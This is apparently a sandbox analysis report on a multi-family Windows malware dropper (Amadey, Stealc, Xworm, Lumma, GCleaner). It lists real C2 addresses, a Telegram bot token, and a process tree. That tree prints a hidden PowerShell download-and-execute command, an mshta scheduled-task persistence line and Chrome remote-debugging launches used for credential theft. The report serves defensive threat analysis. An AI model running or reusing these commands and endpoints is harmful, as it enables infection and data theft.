Overview

overview

10

Static

static

3

54c7d653f1...1a.exe

windows7-x64

10

54c7d653f1...1a.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    150s
  • max time network
    148s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    22-02-2025 12:30

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    54c7d653f14ae0faf17375353ec587dadddf77c3d07161c9bfa35485cba3351a.exe

  • Size

    2.0MB

  • MD5

    354e5ac5449695bd3e8520e47ba4815e

  • SHA1

    a023339baaea904f78d73c5b440ffa764aa9b6a2

  • SHA256

    54c7d653f14ae0faf17375353ec587dadddf77c3d07161c9bfa35485cba3351a

  • SHA512

    ab31ab9d52efb5955003f62ec7d87dd706daf322d154a03bbe3533c385f9802777b1e939b9cfdbe9acd4431e7855907ae0d3c88a89ced8b20fb30a008550d42e

  • SSDEEP

    49152:PyurhZIw1XiVWyvHdT8rXVZJDBw+fsPtoajy/v/FGiLi/0/dN:n0swdTiXBBRsPCRpLiE

Score
10/10
amadeygcleanerhealerlummapovertystealerstealcxworm9c9aa5a4d2cdrenocredential_accessdefense_evasiondiscoverydropperevasionexecutionloaderpersistenceratspywarestealertrojan

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://185.215.113.16/defend/random.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://185.215.113.16/mine/random.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://185.215.113.16/mine/random.exe

Extracted

Family

amadey

Version

4.42

Botnet

9c9aa5

C2

http://185.215.113.43

Attributes
  • install_dir

    abc3bc1985

  • install_file

    skotes.exe

  • strings_key

    8a35cf2ea38c2817dba29a4b5b25dcf0

  • url_paths

    /Zu7JuNko/index.php

rc4.plain

Extracted

Family

stealc

Botnet

reno

C2

http://185.215.113.115

Attributes
  • url_path

    /c4becf79229cb002.php

Extracted

Family

amadey

Version

5.21

Botnet

a4d2cd

C2

http://cobolrationumelawrtewarms.com

http://�������� jlgenfekjlfnvtgpegkwr.xyz
Attributes
  • install_dir

    a58456755d

  • install_file

    Gxtuum.exe

  • strings_key

    00fadbeacf092dfd58b48ef4ac68f826

  • url_paths

    /3ofn3jf3e2ljk/index.php

rc4.plain

Extracted

Family

xworm

Version

5.0

C2

185.163.204.65:7000

Mutex

SWaSxcOz2FkLWFU7

Attributes
  • install_file

    USB.exe

  • telegram

    https://api.telegram.org/bot7801507553:AAER1leGn_BtfmbwwWVlXFOz-GpclQKTfe0/sendMessage?chat_id=6012304042

aes.plain

Extracted

Family

lumma

C2

https://embarkiffe.shop/api

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

    trojanamadey
  • Amadey family
    amadey
  • Detect Poverty Stealer Payload 1 IoCs
  • Detect Xworm Payload 2 IoCs
  • Detects Healer an antivirus disabler dropper 2 IoCs
  • GCleaner

    GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.

    loadergcleaner
  • Gcleaner family
    gcleaner
  • Healer

    Healer an antivirus disabler dropper.

    dropperhealer
  • Healer family
    healer
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

    stealerlumma
  • Lumma family
    lumma
  • Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs
    evasiontrojan
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
    defense_evasiontrojan
  • Modifies Windows Defender TamperProtection settings 3 TTPs 1 IoCs
    evasiontrojan
  • Modifies Windows Defender notification settings 3 TTPs 2 IoCs
    defense_evasiontrojan
  • Poverty Stealer

    Poverty Stealer is a crypto and infostealer written in C++.

    stealerpovertystealer
  • Povertystealer family
    povertystealer
  • Stealc

    Stealc is an infostealer written in C++.

    stealerstealc
  • Stealc family
    stealc
  • Xworm

    Xworm is a remote access trojan written in C#.

    trojanratxworm
  • Xworm family
    xworm
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 21 IoCs
    defense_evasion
  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

    Using powershell.exe command.

    execution
  • Downloads MZ/PE file 27 IoCs
  • Uses browser remote debugging 2 TTPs 4 IoCs

    Can be used control the browser and steal sensitive information such as credentials and session cookies.

    credential_accessstealer
  • Checks BIOS information in registry 2 TTPs 42 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Executes dropped EXE 34 IoCs
  • Identifies Wine through registry keys 2 TTPs 21 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

    defense_evasion
  • Loads dropped DLL 64 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

    spywarestealer
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

    spywarestealer
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

    credential_accessstealer
  • Windows security modification 2 TTPs 2 IoCs
    defense_evasiontrojan
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
    spyware
  • Adds Run key to start application 2 TTPs 8 IoCs
    persistence
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • AutoIT Executable 3 IoCs

    AutoIT scripts compiled to PE executables.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 21 IoCs
  • Suspicious use of SetThreadContext 10 IoCs
  • Drops file in Windows directory 3 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

    discovery
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Checks processor information in registry 2 TTPs 8 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 2 IoCs
    defense_evasion
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Kills process with taskkill 5 IoCs
    defense_evasion
  • Modifies Internet Explorer settings 1 TTPs 3 IoCs
    adwarespyware
  • Modifies registry class 1 IoCs
  • Modifies system certificate store 2 TTPs 8 IoCs
    defense_evasionspywaretrojan
  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 32 IoCs
  • Suspicious use of FindShellTrayWindow 57 IoCs
  • Suspicious use of SendNotifyMessage 19 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Users\Admin\AppData\Local\Temp\54c7d653f14ae0faf17375353ec587dadddf77c3d07161c9bfa35485cba3351a.exe
    "C:\Users\Admin\AppData\Local\Temp\54c7d653f14ae0faf17375353ec587dadddf77c3d07161c9bfa35485cba3351a.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Identifies Wine through registry keys
    • Loads dropped DLL
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of WriteProcessMemory
    PID:2372
    • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
      "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Downloads MZ/PE file
      • Checks BIOS information in registry
      • Executes dropped EXE
      • Identifies Wine through registry keys
      • Loads dropped DLL
      • Adds Run key to start application
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:2816
      • C:\Users\Admin\AppData\Local\Temp\1091498001\amnew.exe
        "C:\Users\Admin\AppData\Local\Temp\1091498001\amnew.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Drops file in Windows directory
        • System Location Discovery: System Language Discovery
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of WriteProcessMemory
        PID:1248
        • C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
          "C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"
          4⤵
          • Downloads MZ/PE file
          • Executes dropped EXE
          • Loads dropped DLL
          • Adds Run key to start application
          • System Location Discovery: System Language Discovery
          • Modifies system certificate store
          • Suspicious use of WriteProcessMemory
          PID:2008
          • C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe
            "C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe"
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:296
            • C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe
              "C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe"
              6⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:1888
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 296 -s 560
              6⤵
              • Loads dropped DLL
              • Program crash
              PID:2848
          • C:\Users\Admin\AppData\Local\Temp\10011850101\62be2e4ee5.exe
            "C:\Users\Admin\AppData\Local\Temp\10011850101\62be2e4ee5.exe"
            5⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            PID:2612
          • C:\Users\Admin\AppData\Local\Temp\10011860101\ad8ebfe024.exe
            "C:\Users\Admin\AppData\Local\Temp\10011860101\ad8ebfe024.exe"
            5⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            PID:1856
            • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
              "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
              6⤵
              • Downloads MZ/PE file
              • Loads dropped DLL
              • System Location Discovery: System Language Discovery
              PID:2808
      • C:\Users\Admin\AppData\Local\Temp\1091546001\2164843fd0.exe
        "C:\Users\Admin\AppData\Local\Temp\1091546001\2164843fd0.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Modifies system certificate store
        • Suspicious behavior: EnumeratesProcesses
        PID:1492
      • C:\Users\Admin\AppData\Local\Temp\1091548001\ed90bc6894.exe
        "C:\Users\Admin\AppData\Local\Temp\1091548001\ed90bc6894.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        PID:2852
        • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
          "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:3024
      • C:\Users\Admin\AppData\Local\Temp\1091549001\2fc4862a06.exe
        "C:\Users\Admin\AppData\Local\Temp\1091549001\2fc4862a06.exe"
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Modifies system certificate store
        • Suspicious behavior: EnumeratesProcesses
        PID:2464
      • C:\Users\Admin\AppData\Local\Temp\1091550001\b711227598.exe
        "C:\Users\Admin\AppData\Local\Temp\1091550001\b711227598.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:1740
      • C:\Users\Admin\AppData\Local\Temp\1091551001\53d97ceeb1.exe
        "C:\Users\Admin\AppData\Local\Temp\1091551001\53d97ceeb1.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2220
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
          4⤵
            PID:3068
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
            4⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of AdjustPrivilegeToken
            PID:2192
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
            4⤵
            • System Location Discovery: System Language Discovery
            PID:1804
        • C:\Users\Admin\AppData\Local\Temp\1091552001\025263805b.exe
          "C:\Users\Admin\AppData\Local\Temp\1091552001\025263805b.exe"
          3⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of SetThreadContext
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          PID:2844
          • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
            "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
            4⤵
            • Downloads MZ/PE file
            • Loads dropped DLL
            • System Location Discovery: System Language Discovery
            PID:3048
        • C:\Users\Admin\AppData\Local\Temp\1091553001\ftS1RPn.exe
          "C:\Users\Admin\AppData\Local\Temp\1091553001\ftS1RPn.exe"
          3⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          PID:2476
        • C:\Users\Admin\AppData\Local\Temp\1091554001\DF9PCFR.exe
          "C:\Users\Admin\AppData\Local\Temp\1091554001\DF9PCFR.exe"
          3⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of SetThreadContext
          • System Location Discovery: System Language Discovery
          PID:2088
          • C:\Users\Admin\AppData\Local\Temp\1091554001\DF9PCFR.exe
            "C:\Users\Admin\AppData\Local\Temp\1091554001\DF9PCFR.exe"
            4⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            PID:2496
        • C:\Users\Admin\AppData\Local\Temp\1091555001\uXivbut.exe
          "C:\Users\Admin\AppData\Local\Temp\1091555001\uXivbut.exe"
          3⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Loads dropped DLL
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Drops file in Windows directory
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of FindShellTrayWindow
          PID:2968
          • C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
            "C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe"
            4⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Loads dropped DLL
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            PID:1256
            • C:\Users\Admin\AppData\Roaming\10000180100\sha256.exe
              "C:\Users\Admin\AppData\Roaming\10000180100\sha256.exe"
              5⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious behavior: EnumeratesProcesses
              PID:1104
        • C:\Users\Admin\AppData\Local\Temp\1091556001\8QQOJj9.exe
          "C:\Users\Admin\AppData\Local\Temp\1091556001\8QQOJj9.exe"
          3⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          PID:1748
        • C:\Users\Admin\AppData\Local\Temp\1091557001\5aeda337ba.exe
          "C:\Users\Admin\AppData\Local\Temp\1091557001\5aeda337ba.exe"
          3⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of SetThreadContext
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2016
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
            4⤵
              PID:1788
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
              4⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of AdjustPrivilegeToken
              PID:1852
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
              4⤵
              • System Location Discovery: System Language Discovery
              PID:3444
          • C:\Users\Admin\AppData\Local\Temp\1091558001\7tzlyz8.exe
            "C:\Users\Admin\AppData\Local\Temp\1091558001\7tzlyz8.exe"
            3⤵
            • Executes dropped EXE
            • Suspicious behavior: AddClipboardFormatListener
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of SetWindowsHookEx
            PID:2488
          • C:\Users\Admin\AppData\Local\Temp\1091559001\206f21b5b7.exe
            "C:\Users\Admin\AppData\Local\Temp\1091559001\206f21b5b7.exe"
            3⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            PID:1736
          • C:\Users\Admin\AppData\Local\Temp\1091560001\8891a969d4.exe
            "C:\Users\Admin\AppData\Local\Temp\1091560001\8891a969d4.exe"
            3⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            PID:1512
            • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
              "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
              4⤵
              • Downloads MZ/PE file
              • Loads dropped DLL
              • System Location Discovery: System Language Discovery
              PID:2972
          • C:\Users\Admin\AppData\Local\Temp\1091561001\c025a997b8.exe
            "C:\Users\Admin\AppData\Local\Temp\1091561001\c025a997b8.exe"
            3⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Checks processor information in registry
            • Suspicious behavior: EnumeratesProcesses
            PID:776
            • C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
              4⤵
              • Uses browser remote debugging
              • Enumerates system info in registry
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of FindShellTrayWindow
              PID:904
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef2069758,0x7fef2069768,0x7fef2069778
                5⤵
                  PID:1664
                • C:\Windows\system32\ctfmon.exe
                  ctfmon.exe
                  5⤵
                    PID:2216
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1156 --field-trial-handle=1220,i,3006663445213483830,2088093597293895669,131072 /prefetch:2
                    5⤵
                      PID:1292
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1504 --field-trial-handle=1220,i,3006663445213483830,2088093597293895669,131072 /prefetch:8
                      5⤵
                        PID:1936
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1600 --field-trial-handle=1220,i,3006663445213483830,2088093597293895669,131072 /prefetch:8
                        5⤵
                          PID:1660
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2228 --field-trial-handle=1220,i,3006663445213483830,2088093597293895669,131072 /prefetch:1
                          5⤵
                          • Uses browser remote debugging
                          PID:920
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2236 --field-trial-handle=1220,i,3006663445213483830,2088093597293895669,131072 /prefetch:1
                          5⤵
                          • Uses browser remote debugging
                          PID:2196
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1180 --field-trial-handle=1220,i,3006663445213483830,2088093597293895669,131072 /prefetch:2
                          5⤵
                            PID:3200
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9223 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=1128 --field-trial-handle=1220,i,3006663445213483830,2088093597293895669,131072 /prefetch:1
                            5⤵
                            • Uses browser remote debugging
                            PID:3420
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3508 --field-trial-handle=1220,i,3006663445213483830,2088093597293895669,131072 /prefetch:8
                            5⤵
                              PID:3472
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3544 --field-trial-handle=1220,i,3006663445213483830,2088093597293895669,131072 /prefetch:8
                              5⤵
                                PID:3480
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3688 --field-trial-handle=1220,i,3006663445213483830,2088093597293895669,131072 /prefetch:8
                                5⤵
                                  PID:4084
                              • C:\Windows\SysWOW64\cmd.exe
                                "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\5x47q" & exit
                                4⤵
                                • System Location Discovery: System Language Discovery
                                PID:2204
                                • C:\Windows\SysWOW64\timeout.exe
                                  timeout /t 10
                                  5⤵
                                  • System Location Discovery: System Language Discovery
                                  • Delays execution with timeout.exe
                                  PID:3632
                            • C:\Users\Admin\AppData\Local\Temp\1091562101\c8eeb9dd28.exe
                              "C:\Users\Admin\AppData\Local\Temp\1091562101\c8eeb9dd28.exe"
                              3⤵
                              • Executes dropped EXE
                              • Suspicious use of FindShellTrayWindow
                              • Suspicious use of SendNotifyMessage
                              PID:1860
                              • C:\Windows\SysWOW64\cmd.exe
                                C:\Windows\system32\cmd.exe /c schtasks /create /tn VDKZMmaZFdj /tr "mshta C:\Users\Admin\AppData\Local\Temp\l9CNrNnwk.hta" /sc minute /mo 25 /ru "Admin" /f
                                4⤵
                                • System Location Discovery: System Language Discovery
                                PID:3052
                                • C:\Windows\SysWOW64\schtasks.exe
                                  schtasks /create /tn VDKZMmaZFdj /tr "mshta C:\Users\Admin\AppData\Local\Temp\l9CNrNnwk.hta" /sc minute /mo 25 /ru "Admin" /f
                                  5⤵
                                  • System Location Discovery: System Language Discovery
                                  • Scheduled Task/Job: Scheduled Task
                                  PID:1564
                              • C:\Windows\SysWOW64\mshta.exe
                                mshta C:\Users\Admin\AppData\Local\Temp\l9CNrNnwk.hta
                                4⤵
                                • System Location Discovery: System Language Discovery
                                • Modifies Internet Explorer settings
                                PID:948
                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'UOIKFFCJPXOLRDSRF5JQIRTHBLAHV9ER.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
                                  5⤵
                                  • Blocklisted process makes network request
                                  • Command and Scripting Interpreter: PowerShell
                                  • Downloads MZ/PE file
                                  • Loads dropped DLL
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:2936
                                  • C:\Users\Admin\AppData\Local\TempUOIKFFCJPXOLRDSRF5JQIRTHBLAHV9ER.EXE
                                    "C:\Users\Admin\AppData\Local\TempUOIKFFCJPXOLRDSRF5JQIRTHBLAHV9ER.EXE"
                                    6⤵
                                    • Modifies Windows Defender DisableAntiSpyware settings
                                    • Modifies Windows Defender Real-time Protection settings
                                    • Modifies Windows Defender TamperProtection settings
                                    • Modifies Windows Defender notification settings
                                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                    • Checks BIOS information in registry
                                    • Executes dropped EXE
                                    • Identifies Wine through registry keys
                                    • Windows security modification
                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                    • System Location Discovery: System Language Discovery
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:2360
                            • C:\Windows\SysWOW64\cmd.exe
                              cmd /c ""C:\Users\Admin\AppData\Local\Temp\1091563021\am_no.cmd" "
                              3⤵
                              • System Location Discovery: System Language Discovery
                              PID:1292
